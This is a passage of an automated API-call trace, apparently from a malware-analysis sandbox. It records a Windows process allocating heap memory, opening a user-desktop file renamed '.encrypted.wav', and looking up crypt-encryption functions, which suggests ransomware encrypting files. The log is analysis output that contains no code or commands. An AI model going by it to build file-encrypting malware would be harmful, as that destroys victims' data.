[0031.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0031.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0031.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0031.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0031.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0031.059] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\EVqXht.encrypted.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\tjni\\evqxht.encrypted.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0031.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0031.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0031.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0031.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0031.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0031.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0031.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0031.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0031.060] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0031.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0031.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0031.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0031.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0031.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0031.060] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0031.060] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0031.060] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0031.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0031.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0031.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0031.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0031.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0031.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0031.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0031.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0031.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0031.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0031.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0031.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0031.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0031.061] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0031.061] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x1575, lpOverlapped=0x0) returned 1 [0031.061] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0031.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0031.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0031.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0031.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1575) returned 0x7c7968 [0031.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0031.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0031.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0031.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0031.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0031.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0031.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1575) returned 0x7c8ee8 [0031.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c7968 | out: hHeap=0x770000) returned 1 [0031.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.062] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0031.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0031.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0031.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0031.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0031.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1575) returned 0x7c7968 [0031.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0031.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c7968 | out: hHeap=0x770000) returned 1 [0031.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0031.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0031.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0031.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.063] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0031.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0031.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0031.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0031.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0031.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0031.063] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0031.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0031.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0031.063] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0031.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0031.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0031.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da198 [0031.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0031.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0031.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0031.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0031.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1575) returned 0x7c7968 [0031.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0031.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1b8 [0031.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0031.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0031.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0031.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1f8 [0031.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0031.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0031.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0031.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da148 [0031.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0031.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0031.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0031.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ce08 [0031.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0031.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0031.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0031.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0031.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0031.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1575) returned 0x955018 [0031.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0031.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0031.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0031.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0031.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0031.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0031.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0031.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0031.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0031.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0031.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0031.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0031.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0031.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0031.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0031.064] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0031.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0031.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0031.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0031.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0031.064] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0031.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0031.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0031.065] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0031.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0031.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0031.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0031.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0031.065] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0031.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0031.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0031.065] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0031.065] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0031.065] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0031.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0031.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da3c8 [0031.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0031.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0031.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0031.065] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0031.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c8f8 [0031.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0031.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0031.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0031.065] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0031.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0031.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0031.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0031.065] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0031.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0031.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0031.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0031.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0031.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0031.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0031.066] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0031.066] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0031.066] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0031.066] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0031.066] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0031.066] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0031.066] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0031.066] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0031.066] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0031.066] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0031.066] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0031.066] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0031.066] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0031.066] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0031.066] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0031.066] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0031.066] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0031.067] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0031.067] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0031.067] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0031.067] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0031.067] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0031.067] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0031.067] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0031.067] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0031.067] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0031.067] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0031.067] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0031.067] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0031.067] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0031.067] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0031.067] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0031.067] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0031.067] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0031.067] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.067] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0031.067] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0031.067] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0031.067] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0031.067] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0031.067] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0031.067] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0031.067] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0031.067] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0031.067] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0031.067] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.067] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0031.067] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0031.067] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0031.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0031.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0031.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0031.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0031.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0031.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0031.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0031.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0031.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0031.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0031.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0031.068] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0031.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0031.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0031.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0031.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0031.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0031.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0031.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0031.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0031.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0031.068] 